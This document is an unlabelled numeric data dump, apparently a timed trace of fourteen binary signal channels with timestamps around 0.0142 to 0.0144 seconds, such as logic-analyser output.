0,0,1,1,1,1,0,0,0,0,0,0,0,0,1.4247496e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247500e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4247516e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247540e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4247544e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4247588e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4247612e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4247640e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4247664e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247672e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4247692e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247716e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4247740e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247764e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4247788e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247812e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4247820e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4247868e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4247892e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,1.4247896e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247900e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4247916e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247940e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4247944e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4247988e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4248012e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248020e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4248040e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248064e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4248092e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248116e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4248140e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248164e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,1.4248168e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4248172e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4248188e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4248212e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4248264e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4248292e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,1.4248296e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248300e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4248316e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248340e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4248364e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248388e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4248412e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248440e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4248444e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4248464e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4248492e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4248516e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4248540e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4248564e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4248588e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248596e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4248640e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248664e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4248692e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248716e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4248740e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248764e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,1.4248768e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4248772e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4248816e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4248840e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,1.4248844e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248848e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4248864e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248892e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4248916e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248940e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4248964e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4248988e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4248996e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4249012e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4249040e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4249044e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4249064e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4249092e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4249140e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4249164e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4249188e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4249212e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4249220e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4249240e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4249264e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4249288e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4249312e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4249336e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,1.4249364e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4249368e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4249412e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4249436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4249444e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4249460e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4249484e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4249492e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4249540e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4249564e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,1.4249568e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4249572e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4249588e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4249612e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4249636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4249660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4249684e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4249712e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4249716e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4249764e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4249788e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4249796e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4249812e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4249836e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4249860e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4249884e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4249912e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4249936e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4249940e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4249988e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4250012e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250020e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250088e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250112e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250140e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,1.4250164e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4250168e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4250188e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4250212e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250220e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250312e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250340e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250364e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250388e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250412e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250488e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250512e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250536e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250564e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250588e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250612e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250688e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250712e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250736e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250764e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250788e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250812e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250884e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250912e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250940e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4250964e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4250988e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251012e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251088e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251112e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251140e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251164e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251188e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251212e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251288e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251312e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251336e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251364e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251388e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251412e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251484e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251512e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251540e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251564e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251588e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251612e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251684e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251712e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251736e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251764e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251788e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251812e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251884e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251912e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251936e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4251964e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4251988e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252012e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252084e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252112e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252140e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252164e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252188e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252212e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252288e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252312e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252340e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252364e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252388e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252412e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252488e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252512e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252536e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252564e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252588e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252612e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252688e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252712e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252736e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252764e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252788e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252812e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252888e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252912e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252940e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4252964e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4252988e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4253012e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4253036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4253060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4253088e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4253112e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4253136e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4253164e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4253188e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4253212e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4253236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4253260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4253284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4253312e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4253340e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4253364e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4253388e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4253412e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4253436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4253460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4253484e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4253508e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4378076e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4378276e-02 1,0,1,1,1,0,0,0,0,0,0,1,0,1,1.4378304e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4378328e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,1.4378628e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4378652e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,1,1.4378656e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.4378660e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,1,1.4378700e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.4378724e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4378732e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,1.4378748e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4378772e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.4378780e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,1,1.4378828e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.4378848e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4378860e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,1.4378872e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.4378900e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4378908e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4378948e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4378972e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4378980e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4379000e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379024e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4379028e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4379072e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4379100e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.4379104e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379108e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4379124e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379148e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4379172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379200e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4379224e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379248e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4379272e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4379300e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4379348e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4379372e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379380e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4379400e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379424e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4379428e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4379472e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4379500e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.4379504e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379508e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4379524e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379548e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4379572e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379600e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4379624e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379652e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4379672e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4379700e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4379748e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4379772e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379780e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4379800e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379824e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4379828e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4379872e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4379900e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.4379904e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379908e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4379924e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4379948e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4379972e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380000e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380024e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380052e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380076e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380100e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4380104e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4380148e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4380176e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380180e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380200e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380224e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380252e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380276e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380300e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380324e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380348e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380372e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380400e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380424e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380452e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380476e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4380480e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4380524e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4380548e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380556e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380576e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380600e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380624e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4380652e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4380700e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4380724e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380732e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380748e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380772e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380800e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380824e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380852e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380876e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380900e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380924e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4380948e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4380972e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4380980e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4381028e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4381052e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.4381056e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4381060e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4381076e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4381100e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4381124e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4381148e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4381172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4381196e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4381220e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4381248e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4381252e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4381300e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4381324e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4381332e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4381348e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4381372e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,1.4381376e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4381380e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4381420e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4381448e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.4381452e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4381456e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4381500e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4381524e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4381572e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4381596e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4381648e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4381672e-02 